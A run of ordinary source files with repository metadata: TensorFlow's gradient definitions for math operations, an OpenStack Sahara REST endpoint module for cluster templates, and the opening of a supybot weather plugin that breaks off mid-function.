den = math_ops.sqrt(math_ops.subtract(one, x2))
inv = math_ops.reciprocal(den)
return -grad * inv
@ops.RegisterGradient("Atan")
def _AtanGrad(op, grad):
"""Returns grad * 1/ (1 + x^2)."""
x = op.inputs[0]
with ops.control_dependencies([grad]):
x = math_ops.conj(x)
x2 = math_ops.square(x)
one = constant_op.constant(1, dtype=grad.dtype)
inv = math_ops.reciprocal(math_ops.add(one, x2))
return grad * inv
@ops.RegisterGradient("Atan2")
def _Atan2Grad(op, grad):
"""Returns grad * x / (x^2 + y^2), grad * -y / (x^2 + y^2)."""
y = op.inputs[0]
x = op.inputs[1]
with ops.control_dependencies([grad]):
grad_inv = grad / (math_ops.square(x) + math_ops.square(y))
return x * grad_inv, -y * grad_inv
@ops.RegisterGradient("AddN")
def _AddNGrad(op, grad):
"""Copies the gradient to all inputs."""
# Not broadcasting.
return [grad] * len(op.inputs)
def _ShapesFullySpecifiedAndEqual(x, y, grad):
# pylint: disable=protected-access
x_shape = x._shape_tuple()
y_shape = y._shape_tuple()
grad_shape = grad._shape_tuple()
# pylint: enable=protected-access
return (x_shape == y_shape and x_shape == grad_shape and
x_shape is not None and None not in x_shape)
@ops.RegisterGradient("Add")
@ops.RegisterGradient("AddV2")
def _AddGrad(op, grad):
"""Gradient for Add."""
y = op.inputs[1]
skip_input_indices = None
try:
skip_input_indices = op.skip_input_indices
if skip_input_indices is not None and 1 in skip_input_indices and _IsScalar(
y):
return grad, None
except AttributeError:
# No gradient skipping, so do the full gradient computation
pass
x = op.inputs[0]
if (isinstance(grad, ops.Tensor) and
_ShapesFullySpecifiedAndEqual(x, y, grad)):
return grad, grad
(sx, rx, must_reduce_x), (sy, ry, must_reduce_y) = (
SmartBroadcastGradientArgs(x, y, grad))
if skip_input_indices is not None and 0 in skip_input_indices:
gx = None
elif not must_reduce_x:
gx = grad
else:
gx = array_ops.reshape(math_ops.reduce_sum(grad, rx), sx)
if skip_input_indices is not None and 1 in skip_input_indices:
gy = None
elif not must_reduce_y:
gy = grad
else:
gy = array_ops.reshape(math_ops.reduce_sum(grad, ry), sy)
return (gx, gy)
@ops.RegisterGradient("Sub")
def _SubGrad(op, grad):
"""Gradient for Sub."""
y = op.inputs[1]
skip_input_indices = None
try:
skip_input_indices = op.skip_input_indices
if skip_input_indices is not None and 1 in skip_input_indices and _IsScalar(
y):
return grad, None
except AttributeError:
# No gradient skipping, so do the full gradient computation
pass
x = op.inputs[0]
if (isinstance(grad, ops.Tensor) and
_ShapesFullySpecifiedAndEqual(x, y, grad)):
return grad, -grad
(sx, rx, must_reduce_x), (sy, ry, must_reduce_y) = (
SmartBroadcastGradientArgs(x, y, grad))
if skip_input_indices is not None and 0 in skip_input_indices:
gx = None
elif not must_reduce_x:
gx = grad
else:
gx = array_ops.reshape(math_ops.reduce_sum(grad, rx), sx)
if skip_input_indices is not None and 1 in skip_input_indices:
gy = None
elif not must_reduce_y:
gy = -grad
else:
gy = array_ops.reshape(math_ops.reduce_sum(-grad, ry), sy)
return (gx, gy)
@ops.RegisterGradient("Mul")
def _MulGrad(op, grad):
"""The gradient of scalar multiplication."""
y = op.inputs[1]
skip_input_indices = None
try:
skip_input_indices = op.skip_input_indices
if skip_input_indices is not None and 1 in skip_input_indices and _IsScalar(
y):
return gen_math_ops.mul(grad, math_ops.conj(y)), None
except AttributeError:
# No gradient skipping, so do the full gradient computation
pass
x = op.inputs[0]
if (isinstance(grad, ops.Tensor) and
_ShapesFullySpecifiedAndEqual(x, y, grad) and
grad.dtype in (dtypes.int32, dtypes.float32)):
return gen_math_ops.mul(grad, y), gen_math_ops.mul(grad, x)
assert x.dtype.base_dtype == y.dtype.base_dtype, (x.dtype, " vs. ", y.dtype)
(sx, rx, must_reduce_x), (sy, ry, must_reduce_y) = (
SmartBroadcastGradientArgs(x, y, grad))
x = math_ops.conj(x)
y = math_ops.conj(y)
if skip_input_indices is not None and 0 in skip_input_indices:
gx = None
elif not must_reduce_x:
gx = gen_math_ops.mul(grad, y)
else:
gx = array_ops.reshape(
math_ops.reduce_sum(gen_math_ops.mul(grad, y), rx), sx)
if skip_input_indices is not None and 1 in skip_input_indices:
gy = None
elif not must_reduce_y:
gy = gen_math_ops.mul(x, grad)
else:
gy = array_ops.reshape(
math_ops.reduce_sum(gen_math_ops.mul(x, grad), ry), sy)
return (gx, gy)
@ops.RegisterGradient("MulNoNan")
def _MulNoNanGrad(op, grad):
"""The gradient of scalar multiplication with NaN-suppression."""
x = op.inputs[0]
y = op.inputs[1]
if (isinstance(grad, ops.Tensor) and
_ShapesFullySpecifiedAndEqual(x, y, grad)):
return gen_math_ops.mul_no_nan(grad, y), gen_math_ops.mul_no_nan(x, grad)
assert x.dtype.base_dtype == y.dtype.base_dtype, (x.dtype, " vs. ", y.dtype)
sx = array_ops.shape(x)
sy = array_ops.shape(y)
rx, ry = gen_array_ops.broadcast_gradient_args(sx, sy)
return (array_ops.reshape(
math_ops.reduce_sum(gen_math_ops.mul_no_nan(grad, y), rx), sx),
array_ops.reshape(
math_ops.reduce_sum(gen_math_ops.mul_no_nan(x, grad), ry), sy))
@ops.RegisterGradient("Div")
def _DivGrad(op, grad):
"""The gradient for the Div operator."""
x = op.inputs[0]
y = op.inputs[1]
sx = array_ops.shape(x)
sy = array_ops.shape(y)
rx, ry = gen_array_ops.broadcast_gradient_args(sx, sy)
x = math_ops.conj(x)
y = math_ops.conj(y)
return (array_ops.reshape(
math_ops.reduce_sum(math_ops.divide(grad, y), rx), sx),
array_ops.reshape(
math_ops.reduce_sum(
grad * math_ops.divide(math_ops.divide(-x, y), y), ry), sy))
@ops.RegisterGradient("FloorDiv")
def _FloorDivGrad(_, unused_grad):
"""The gradient for the FloorDiv operator."""
return None, None
@ops.RegisterGradient("FloorMod")
def _FloorModGrad(op, grad):
"""Returns grad * (1, -floor(x/y))."""
x = math_ops.conj(op.inputs[0])
y = math_ops.conj(op.inputs[1])
sx = array_ops.shape(x)
sy = array_ops.shape(y)
rx, ry = gen_array_ops.broadcast_gradient_args(sx, sy)
floor_xy = math_ops.floor_div(x, y)
gx = array_ops.reshape(math_ops.reduce_sum(grad, rx), sx)
gy = array_ops.reshape(
math_ops.reduce_sum(grad * math_ops.negative(floor_xy), ry), sy)
return gx, gy
@ops.RegisterGradient("TruncateDiv")
def _TruncateDivGrad(_, unused_grad):
return None, None
@ops.RegisterGradient("RealDiv")
def _RealDivGrad(op, grad):
"""RealDiv op gradient."""
x = op.inputs[0]
y = op.inputs[1]
sx = array_ops.shape(x)
sy = array_ops.shape(y)
rx, ry = gen_array_ops.broadcast_gradient_args(sx, sy)
x = math_ops.conj(x)
y = math_ops.conj(y)
return (array_ops.reshape(
math_ops.reduce_sum(math_ops.realdiv(grad, y), rx), sx),
array_ops.reshape(
math_ops.reduce_sum(
grad * math_ops.realdiv(math_ops.realdiv(-x, y), y), ry), sy))
@ops.RegisterGradient("DivNoNan")
def _DivNoNanGrad(op, grad):
"""DivNoNan op gradient."""
x = op.inputs[0]
y = op.inputs[1]
sx = array_ops.shape(x)
sy = array_ops.shape(y)
rx, ry = gen_array_ops.broadcast_gradient_args(sx, sy)
x = math_ops.conj(x)
y = math_ops.conj(y)
return (array_ops.reshape(
math_ops.reduce_sum(math_ops.div_no_nan(grad, y), rx), sx),
array_ops.reshape(
math_ops.reduce_sum(
grad * math_ops.div_no_nan(math_ops.div_no_nan(-x, y), y),
ry), sy))
@ops.RegisterGradient("Pow")
def _PowGrad(op, grad):
"""Returns grad * (y*x^(y-1), z*log(x))."""
x = op.inputs[0]
y = op.inputs[1]
skip_input_indices = None
try:
skip_input_indices = op.skip_input_indices
# TODO(mrry): If `y` is a constant, we can combine `tf.sub()` and the
# constant `1` into a single constant op.
if skip_input_indices is not None and 1 in skip_input_indices and _IsScalar(
y):
x = math_ops.conj(x)
y = math_ops.conj(y)
return grad * y * math_ops.pow(x, y - 1), None
except AttributeError:
# No gradient skipping, so do the full gradient computation
pass
(sx, rx, must_reduce_x), (sy, ry, must_reduce_y) = (
SmartBroadcastGradientArgs(x, y, grad))
x = math_ops.conj(x)
y = math_ops.conj(y)
if skip_input_indices is None or 0 not in skip_input_indices:
gx = grad * y * math_ops.pow(x, y - 1)
if must_reduce_x:
gx = array_ops.reshape(math_ops.reduce_sum(gx, rx), sx)
else:
gx = None
if skip_input_indices is None or 1 not in skip_input_indices:
z = math_ops.conj(op.outputs[0])
# Avoid false singularity at x = 0
if x.dtype.is_complex:
# real(x) < 0 is fine for the complex case
mask = math_ops.not_equal(x, 0)
else:
# There's no sensible real value to return if x < 0, so return 0
mask = x > 0
safe_x = array_ops.where(mask, x, array_ops.ones_like(x))
log_x = array_ops.where(mask, math_ops.log(safe_x), array_ops.zeros_like(x))
gy = grad * z * log_x
if must_reduce_y:
gy = array_ops.reshape(math_ops.reduce_sum(gy, ry), sy)
else:
gy = None
return gx, gy
def _MaximumMinimumGradInputOnly(op, grad, selector_op):
x = op.inputs[0]
y = op.inputs[1]
zeros = array_ops.zeros_like(grad)
xmask = selector_op(x, y)
xgrad = array_ops.where_v2(xmask, grad, zeros)
ygrad = None # Return None for ygrad since the config allows that.
return (xgrad, ygrad)
def _MaximumMinimumGrad(op, grad, selector_op):
"""Factor out the code for the gradient of Maximum or Minimum."""
y = op.inputs[1]
skip_input_indices = None
try:
skip_input_indices = op.skip_input_indices
if skip_input_indices is not None and 1 in skip_input_indices and _IsScalar(
y):
# When we want to get gradients for the first input only, and the second
# input tensor is a scalar, we can do a much simpler calculation
return _MaximumMinimumGradInputOnly(op, grad, selector_op)
except AttributeError:
# No gradient skipping, so do the full gradient computation
pass
x = op.inputs[0]
sx = array_ops.shape(x)
sy = array_ops.shape(y)
zeros = array_ops.zeros_like(grad)
xmask = selector_op(x, y)
rx, ry = gen_array_ops.broadcast_gradient_args(sx, sy)
if skip_input_indices is not None and 0 in skip_input_indices:
gx = None
else:
xgrad = array_ops.where_v2(xmask, grad, zeros)
gx = array_ops.reshape(math_ops.reduce_sum(xgrad, rx), sx)
if skip_input_indices is not None and 1 in skip_input_indices:
gy = None
else:
ygrad = array_ops.where_v2(xmask, zeros, grad)
gy = array_ops.reshape(math_ops.reduce_sum(ygrad, ry), sy)
return (gx, gy)
@ops.RegisterGradient("Maximum")
def _MaximumGrad(op, grad):
"""Returns grad*(x > y, x <= y) with type of grad."""
return _MaximumMinimumGrad(op, grad, math_ops.greater_equal)
@ops.RegisterGradient("Minimum")
def _MinimumGrad(op, grad):
"""Returns grad*(x < y, x >= y) with type of grad."""
return _MaximumMinimumGrad(op, grad, math_ops.less_equal)
@ops.RegisterGradient("SquaredDifference")
def _SquaredDifferenceGrad(op, grad):
"""Returns the gradient for (x-y)^2."""
x = op.inputs[0]
y = op.inputs[1]
skip_input_indices = None
try:
skip_input_indices = op.skip_input_indices
except AttributeError:
# No gradient skipping, so do the full gradient computation
pass
with ops.control_dependencies([grad]):
# The parens ensure that if grad is IndexedSlices, it'll get multiplied by
# Tensor (not a number like 2.0) which causes it to convert to Tensor.
x_grad = math_ops.scalar_mul(2.0, grad) * (x - y)
if (isinstance(grad, ops.Tensor) and
_ShapesFullySpecifiedAndEqual(x, y, grad)):
return x_grad, -x_grad
(sx, rx, must_reduce_x), (sy, ry, must_reduce_y) = (
SmartBroadcastGradientArgs(x, y, grad))
if skip_input_indices is not None and 0 in skip_input_indices:
gx = None
elif must_reduce_x:
gx = array_ops.reshape(math_ops.reduce_sum(x_grad, rx), sx)
else:
gx = x_grad
if skip_input_indices is not None and 1 in skip_input_indices:
gy = None
elif must_reduce_y:
gy = -array_ops.reshape(math_ops.reduce_sum(x_grad, ry), sy)
else:
gy = -x_grad
return (gx, gy)
# Logical operations have no gradients.
ops.NotDifferentiable("Less")
ops.NotDifferentiable("LessEqual")
ops.NotDifferentiable("Greater")
ops.NotDifferentiable("GreaterEqual")
ops.NotDifferentiable("Equal")
ops.NotDifferentiable("ApproximateEqual")
ops.NotDifferentiable("NotEqual")
ops.NotDifferentiable("LogicalAnd")
ops.NotDifferentiable("LogicalOr")
ops.NotDifferentiable("LogicalNot")
@ops.RegisterGradient("Select")
def _SelectGrad(op, grad):
c = op.inputs[0]
x = op.inputs[1]
zeros = array_ops.zeros_like(x)
return (None, array_ops.where(c, grad, zeros), array_ops.where(
c, zeros, grad))
@ops.RegisterGradient("SelectV2")
def _SelectGradV2(op, grad):
c = op.inputs[0]
x = op.inputs[1]
y = op.inputs[2]
zeros = array_ops.zeros([], dtype=grad.dtype.base_dtype)
gx = array_ops.where_v2(c, grad, zeros)
x_shape = array_ops.shape(x)
output_shape = array_ops.shape(op.outputs[0])
# Reduce away broadcasted leading dims.
reduce_x, _ = gen_array_ops.broadcast_gradient_args(x_shape, output_shape)
gx = math_ops.reduce_sum(gx, keepdims=True, axis=reduce_x)
gx = array_ops.reshape(gx, x_shape)
gy = array_ops.where_v2(c, zeros, grad)
y_shape = array_ops.shape(y)
# Reduce away broadcasted leading dims.
reduce_y, _ = gen_array_ops.broadcast_gradient_args(y_shape, output_shape)
gy = math_ops.reduce_sum(gy, keepdims=True, axis=reduce_y)
gy = array_ops.reshape(gy, y_shape)
return (None, gx, gy)
def _MatMulGradAgainstFirstOnly(op, grad):
"""Gradient for MatMul, only for the first input."""
t_a = op.get_attr("transpose_a")
t_b = op.get_attr("transpose_b")
b = math_ops.conj(op.inputs[1])
if not t_a and not t_b:
grad_a = gen_math_ops.mat_mul(grad, b, transpose_b=True)
elif not t_a and t_b:
grad_a = gen_math_ops.mat_mul(grad, b)
elif t_a and not t_b:
grad_a = gen_math_ops.mat_mul(b, grad, transpose_b=True)
elif t_a and t_b:
grad_a = gen_math_ops.mat_mul(b, grad, transpose_a=True, transpose_b=True)
return grad_a, None
def _MatMulGradAgainstSecondOnly(op, grad):
"""Gradient for MatMul, only for the second input."""
t_a = op.get_attr("transpose_a")
t_b = op.get_attr("transpose_b")
a = math_ops.conj(op.inputs[0])
if not t_a and not t_b:
grad_b = gen_math_ops.mat_mul(a, grad, transpose_a=True)
elif not t_a and t_b:
grad_b = gen_math_ops.mat_mul(grad, a, transpose_a=True)
elif t_a and not t_b:
grad_b = gen_math_ops.mat_mul(a, grad)
elif t_a and t_b:
grad_b = gen_math_ops.mat_mul(grad, a, transpose_a=True, transpose_b=True)
return None, grad_b
@ops.RegisterGradient("MatMul")
def _MatMulGrad(op, grad):
"""Gradient for MatMul."""
try:
skip_input_indices = op.skip_input_indices
if skip_input_indices is not None:
if 1 in skip_input_indices:
return _MatMulGradAgainstFirstOnly(op, grad)
elif 0 in skip_input_indices:
return _MatMulGradAgainstSecondOnly(op, grad)
except AttributeError:
# No gradient skipping, so do the full gradient computation
pass
t_a = op.get_attr("transpose_a")
t_b = op.get_attr("transpose_b")
a = math_ops.conj(op.inputs[0])
b = math_ops.conj(op.inputs[1])
if not t_a and not t_b:
grad_a = gen_math_ops.mat_mul(grad, b, transpose_b=True)
grad_b = gen_math_ops.mat_mul(a, grad, transpose_a=True)
elif not t_a and t_b:
grad_a = gen_math_ops.mat_mul(grad, b)
grad_b = gen_math_ops.mat_mul(grad, a, transpose_a=True)
elif t_a and not t_b:
grad_a = gen_math_ops.mat_mul(b, grad, transpose_b=True)
grad_b = gen_math_ops.mat_mul(a, grad)
elif t_a and t_b:
grad_a = gen_math_ops.mat_mul(b, grad, transpose_a=True, transpose_b=True)
grad_b = gen_math_ops.mat_mul(grad, a, transpose_a=True, transpose_b=True)
return grad_a, grad_b
@ops.RegisterGradient("SparseMatMul")
def _SparseMatMulGrad(op, grad):
"""Gradient for SparseMatMul."""
t_a = op.get_attr("transpose_a")
t_b = op.get_attr("transpose_b")
is_sparse = {}
is_sparse[op.inputs[0].ref()] = op.get_attr("a_is_sparse")
is_sparse[op.inputs[1].ref()] = op.get_attr("b_is_sparse")
# Use heuristic to figure out if grad might be sparse
is_sparse[grad.ref()] = not context.executing_eagerly() and (
grad.op.type == "ReluGrad")
def _SparseMatMul(t1, t2, out_dtype, transpose_a=False, transpose_b=False):
"""Helper function to create SparseMatMul op."""
assert t1.ref() in is_sparse and t2.ref() in is_sparse
t1_sparse = is_sparse[t1.ref()]
t2_sparse = is_sparse[t2.ref()]
if transpose_b:
t2 = array_ops.transpose(t2)
transpose_b = False
prod = math_ops.matmul(
t1,
t2,
transpose_a=transpose_a,
transpose_b=transpose_b,
a_is_sparse=t1_sparse,
b_is_sparse=t2_sparse)
if prod.dtype != out_dtype:
prod = math_ops.cast(prod, out_dtype)
return prod
dtype_a = op.inputs[0].dtype
dtype_b = op.inputs[1].dtype
if not t_a and not t_b:
return (_SparseMatMul(grad, op.inputs[1], dtype_a, transpose_b=True),
_SparseMatMul(op.inputs[0], grad, dtype_b, transpose_a=True))
elif not t_a and t_b:
return (_SparseMatMul(grad, op.inputs[1], dtype_a),
_SparseMatMul(grad, op.inputs[0], dtype_b, transpose_a=True))
elif t_a and not t_b:
return (_SparseMatMul(op.inputs[1], grad, dtype_a, transpose_b=True),
_SparseMatMul(op.inputs[0], grad, dtype_b))
elif t_a and t_b:
return (_SparseMatMul(
op.inputs[1], grad, dtype_a, transpose_a=True, transpose_b=True),
_SparseMatMul(
grad, op.inputs[0], dtype_b, transpose_a=True,
transpose_b=True))
@ops.RegisterGradient("Floor")
def _FloorGrad(_, unused_grad):
return [None]
@ops.RegisterGradient("Ceil")
def _CeilGrad(_, unused_grad):
return [None]
@ops.RegisterGradient("Round")
def _RoundGrad(_, unused_grad):
return [None]
@ops.RegisterGradient("Rint")
def _RintGrad(_, unused_grad):
# the gradient of Rint is zero
return [None]
@ops.RegisterGradient("BatchMatMul")
def _BatchMatMul(op, grad):
"""Returns the gradient of x and y given the gradient of x * y."""
x = op.inputs[0]
y = op.inputs[1]
adj_x = op.get_attr("adj_x")
adj_y = op.get_attr("adj_y")
if not adj_x:
if not adj_y:
grad_x = math_ops.matmul(grad, y, adjoint_a=False, adjoint_b=True)
grad_y = math_ops.matmul(x, grad, adjoint_a=True, adjoint_b=False)
else:
grad_x = math_ops.matmul(grad, y, adjoint_a=False, adjoint_b=False)
grad_y = math_ops.matmul(grad, x, adjoint_a=True, adjoint_b=False)
else:
if not adj_y:
grad_x = math_ops.matmul(y, grad, adjoint_a=False, adjoint_b=True)
grad_y = math_ops.matmul(x, grad, adjoint_a=False, adjoint_b=False)
else:
grad_x = math_ops.matmul(y, grad, adjoint_a=True, adjoint_b=True)
grad_y = math_ops.matmul(grad, x, adjoint_a=True, adjoint_b=True)
return grad_x, grad_y
@ops.RegisterGradient("BatchMatMulV2")
def _BatchMatMulV2(op, grad):
"""Returns the gradient of x and y given the gradient of x * y."""
x = op.inputs[0]
y = op.inputs[1]
adj_x = op.get_attr("adj_x")
adj_y = op.get_attr("adj_y")
if not adj_x:
if not adj_y:
grad_x = math_ops.matmul(grad, y, adjoint_a=False, adjoint_b=True)
grad_y = math_ops.matmul(x, grad, adjoint_a=True, adjoint_b=False)
else:
grad_x = math_ops.matmul(grad, y, adjoint_a=False, adjoint_b=False)
grad_y = math_ops.matmul(grad, x, adjoint_a=True, adjoint_b=False)
else:
if not adj_y:
grad_x = math_ops.matmul(y, grad, adjoint_a=False, adjoint_b=True)
grad_y = math_ops.matmul(x, grad, adjoint_a=False, adjoint_b=False)
else:
grad_x = math_ops.matmul(y, grad, adjoint_a=True, adjoint_b=True)
grad_y = math_ops.matmul(grad, x, adjoint_a=True, adjoint_b=True)
# Possibly reduce along the broadcasted batch dimensions, if broadcasting
# is required.
shape_x_static = x.get_shape()
shape_y_static = y.get_shape()
output_may_have_non_empty_batch_shape = (
(shape_x_static.rank is None or shape_x_static.rank > 2) or
(shape_y_static.rank is None or shape_y_static.rank > 2))
batch_shapes_match = (
shape_x_static[:-2].is_fully_defined() and
shape_y_static[:-2].is_fully_defined() and
shape_x_static[:-2] == shape_y_static[:-2])
if (not output_may_have_non_empty_batch_shape) or batch_shapes_match:
return grad_x, grad_y
sx = array_ops.shape(x)
sy = array_ops.shape(y)
rx, ry = gen_array_ops.broadcast_gradient_args(sx[:-2], sy[:-2])
grad_x = array_ops.reshape(math_ops.reduce_sum(grad_x, rx), sx)
grad_y = array_ops.reshape(math_ops.reduce_sum(grad_y, ry), sy)
return grad_x, grad_y
ops.NotDifferentiable("Range")
ops.NotDifferentiable("LinSpace")
@ops.RegisterGradient("Complex")
def _ComplexGrad(op, grad):
"""Returns the real and imaginary components of 'grad', respectively."""
x = op.inputs[0]
y = op.inputs[1]
sx = array_ops.shape(x)
sy = array_ops.shape(y)
rx, ry = gen_array_ops.broadcast_gradient_args(sx, sy)
return (array_ops.reshape(math_ops.reduce_sum(math_ops.real(grad), rx), sx),
array_ops.reshape(math_ops.reduce_sum(math_ops.imag(grad), ry), sy))
@ops.RegisterGradient("Real")
def _RealGrad(_, grad):
"""Returns 'grad' as the real part and set the imaginary part 0."""
zero = constant_op.constant(0, dtype=grad.dtype)
return math_ops.complex(grad, zero)
@ops.RegisterGradient("Imag")
def _ImagGrad(_, grad):
"""Returns 'grad' as the imaginary part and set the real part 0."""
zero = constant_op.constant(0, dtype=grad.dtype)
return math_ops.complex(zero, grad)
@ops.RegisterGradient("Angle")
def _AngleGrad(op, grad):
"""Returns -grad / (Im(x) + iRe(x))"""
x = op.inputs[0]
with ops.control_dependencies([grad]):
re = math_ops.real(x)
im = math_ops.imag(x)
z = math_ops.reciprocal(math_ops.complex(im, re))
zero = constant_op.constant(0, dtype=grad.dtype)
complex_grad = math_ops.complex(grad, zero)
return -complex_grad * z
@ops.RegisterGradient("Conj")
def _ConjGrad(_, grad):
"""Returns the complex conjugate of grad."""
return math_ops.conj(grad)
@ops.RegisterGradient("ComplexAbs")
def _ComplexAbsGrad(op, grad):
"""Returns the gradient of ComplexAbs."""
return math_ops.div_no_nan(
math_ops.complex(
grad, array_ops.zeros_like(grad)) * op.inputs[0],
math_ops.complex(
op.outputs[0], array_ops.zeros_like(op.outputs[0])))
@ops.RegisterGradient("Cast")
def _CastGrad(op, grad):
t = [
dtypes.float16, dtypes.float32, dtypes.float64, dtypes.bfloat16,
dtypes.complex64, dtypes.complex128
]
src_type = op.inputs[0].dtype.base_dtype
dst_type = grad.dtype.base_dtype
if src_type in t and dst_type in t:
return math_ops.cast(grad, src_type)
else:
return None
@ops.RegisterGradient("Cross")
def _CrossGrad(op, grad):
u = op.inputs[0]
v = op.inputs[1]
return (math_ops.cross(v, grad), math_ops.cross(grad, u))
@ops.RegisterGradient("Cumsum")
def _CumsumGrad(op, grad):
axis = op.inputs[1]
exclusive = op.get_attr("exclusive")
reverse = op.get_attr("reverse")
return [
math_ops.cumsum(grad, axis, exclusive=exclusive, reverse=not reverse),
None
]
@ops.RegisterGradient("Cumprod")
def _CumprodGrad(op, grad):
x = op.inputs[0]
axis = op.inputs[1]
exclusive = op.get_attr("exclusive")
reverse = op.get_attr("reverse")
prod = math_ops.cumprod(x, axis, exclusive=exclusive, reverse=reverse)
out = math_ops.cumsum(
prod * grad, axis, exclusive=exclusive, reverse=not reverse)
return [math_ops.div_no_nan(out, x), None]
@ops.RegisterGradient("CumulativeLogsumexp")
def _CumulativeLogsumexpGrad(op, grad):
x = op.inputs[0]
axis = op.inputs[1]
cumulative_logsumexp = op.outputs[0]
exclusive = op.get_attr("exclusive")
reverse = op.get_attr("reverse")
# Split the incoming gradient into positive and negative part
# in order to take logs. This is required for stable results.
log_grad_positive = array_ops.where_v2(
math_ops.greater(grad, 0),
math_ops.log(grad),
grad.dtype.min)
log_grad_negative = array_ops.where_v2(
math_ops.less(grad, 0),
math_ops.log(-grad),
grad.dtype.min)
output_pos = math_ops.exp(
math_ops.cumulative_logsumexp(
log_grad_positive - cumulative_logsumexp,
axis=axis, reverse=not reverse, exclusive=exclusive) + x)
output_neg = math_ops.exp(
math_ops.cumulative_logsumexp(
log_grad_negative - cumulative_logsumexp,
axis=axis, reverse=not reverse, exclusive=exclusive) + x)
return [output_pos - output_neg, None]
@ops.RegisterGradient("NextAfter")
def _NextAfterGrad(op, grad):
"""Returns gradient of nextafter(x1, x2) with respect to x1 and x2."""
x1 = op.inputs[0]
x2 = op.inputs[1]
s_x1 = array_ops.shape(x1)
s_x2 = array_ops.shape(x2)
r_x1, r_x2 = gen_array_ops.broadcast_gradient_args(s_x1, s_x2)
with ops.control_dependencies([grad]):
partial_x1 = array_ops.ones(s_x1, dtype=x1.dtype)
partial_x2 = array_ops.zeros(s_x2, dtype=x2.dtype)
return (array_ops.reshape(
math_ops.reduce_sum(partial_x1 * grad, r_x1), s_x1),
array_ops.reshape(
math_ops.reduce_sum(partial_x2 * grad, r_x2), s_x2))
| {
"content_hash": "efdd32e86529aee76b2009cd213deb88",
"timestamp": "",
"source": "github",
"line_count": 2028,
"max_line_length": 112,
"avg_line_length": 34.69378698224852,
"alnum_prop": 0.6611520914168763,
"repo_name": "annarev/tensorflow",
"id": "c5821ce8fcb052a46f58c93e07a7fdf3766ff214",
"size": "71048",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tensorflow/python/ops/math_grad.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "1286"
},
{
"name": "Batchfile",
"bytes": "9258"
},
{
"name": "C",
"bytes": "341894"
},
{
"name": "C#",
"bytes": "8446"
},
{
"name": "C++",
"bytes": "49343974"
},
{
"name": "CMake",
"bytes": "195286"
},
{
"name": "Dockerfile",
"bytes": "36386"
},
{
"name": "Go",
"bytes": "1253646"
},
{
"name": "HTML",
"bytes": "4681865"
},
{
"name": "Java",
"bytes": "863222"
},
{
"name": "Jupyter Notebook",
"bytes": "2604741"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "52734"
},
{
"name": "Objective-C",
"bytes": "15650"
},
{
"name": "Objective-C++",
"bytes": "99243"
},
{
"name": "PHP",
"bytes": "1357"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "PureBasic",
"bytes": "25356"
},
{
"name": "Python",
"bytes": "41289329"
},
{
"name": "Ruby",
"bytes": "553"
},
{
"name": "Shell",
"bytes": "469612"
},
{
"name": "Smarty",
"bytes": "6976"
}
],
"symlink_target": ""
} |
from sahara.api import acl
from sahara.service.api.v2 import cluster_templates as api
from sahara.service import validation as v
from sahara.service.validations import cluster_template_schema as ct_schema
from sahara.service.validations import cluster_templates as v_ct
import sahara.utils.api as u
rest = u.RestV2('cluster-templates', __name__)
@rest.get('/cluster-templates')
@acl.enforce("data-processing:cluster-templates:get_all")
@v.check_exists(api.get_cluster_template, 'marker')
@v.validate(None, v.validate_pagination_limit,
v.validate_sorting_cluster_templates)
def cluster_templates_list():
result = api.get_cluster_templates(**u.get_request_args().to_dict())
return u.render(res=result, name='cluster_templates')
@rest.post('/cluster-templates')
@acl.enforce("data-processing:cluster-templates:create")
@v.validate(ct_schema.CLUSTER_TEMPLATE_SCHEMA_V2,
v_ct.check_cluster_template_create)
def cluster_templates_create(data):
# renaming hadoop_version -> plugin_version
# this can be removed once APIv1 is deprecated
data['hadoop_version'] = data['plugin_version']
del data['plugin_version']
return u.render(api.create_cluster_template(data).to_wrapped_dict())
@rest.get('/cluster-templates/<cluster_template_id>')
@acl.enforce("data-processing:cluster-templates:get")
@v.check_exists(api.get_cluster_template, 'cluster_template_id')
def cluster_templates_get(cluster_template_id):
return u.to_wrapped_dict(api.get_cluster_template, cluster_template_id)
@rest.patch('/cluster-templates/<cluster_template_id>')
@acl.enforce("data-processing:cluster-templates:modify")
@v.check_exists(api.get_cluster_template, 'cluster_template_id')
@v.validate(ct_schema.CLUSTER_TEMPLATE_UPDATE_SCHEMA_V2,
v_ct.check_cluster_template_update)
def cluster_templates_update(cluster_template_id, data):
data['hadoop_version'] = data['plugin_version']
del data['plugin_version']
return u.to_wrapped_dict(
api.update_cluster_template, cluster_template_id, data)
@rest.delete('/cluster-templates/<cluster_template_id>')
@acl.enforce("data-processing:cluster-templates:delete")
@v.check_exists(api.get_cluster_template, 'cluster_template_id')
@v.validate(None, v_ct.check_cluster_template_usage)
def cluster_templates_delete(cluster_template_id):
api.terminate_cluster_template(cluster_template_id)
return u.render()
| {
"content_hash": "f2e34a801b6951291751e18a3ecfd307",
"timestamp": "",
"source": "github",
"line_count": 59,
"max_line_length": 75,
"avg_line_length": 40.88135593220339,
"alnum_prop": 0.7487562189054726,
"repo_name": "shakamunyi/sahara",
"id": "3db2b7e3de7f0659f0a2faa4d8114373f83d0fbb",
"size": "2995",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "sahara/api/v2/cluster_templates.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Java",
"bytes": "3609"
},
{
"name": "Mako",
"bytes": "36849"
},
{
"name": "PigLatin",
"bytes": "792"
},
{
"name": "Python",
"bytes": "4947252"
},
{
"name": "Shell",
"bytes": "100611"
}
],
"symlink_target": ""
} |
import math
import re
import requests
try:
import ephem
except ImportError as ie:
raise Exception(f'Cannot import module: {ie}')
from datetime import datetime
from functools import lru_cache
from requests.exceptions import HTTPError
from supybot import callbacks, ircutils
import supybot.log as log
from supybot.commands import *
try:
import pgeocode
except ImportError as ie:
raise Exception(f"Cannot import module: {ie}")
#XXX Unicode symbol (https://en.wikipedia.org/wiki/List_of_Unicode_characters#Latin-1_Supplement)
apostrophe = u'\N{APOSTROPHE}'
degree_sign = u'\N{DEGREE SIGN}'
#XXX micro_sign = u'\N{MICRO SIGN}'
percent_sign = u'\N{PERCENT SIGN}'
quotation_mark = u'\N{QUOTATION MARK}'
def contains_number(value):
numbers = re.findall("[0-9]+", value)
return True if numbers else False
def colour(celsius):
"""Colourise temperatures"""
c = float(celsius)
if c < 0:
colour = 'blue'
elif c == 0:
colour = 'teal'
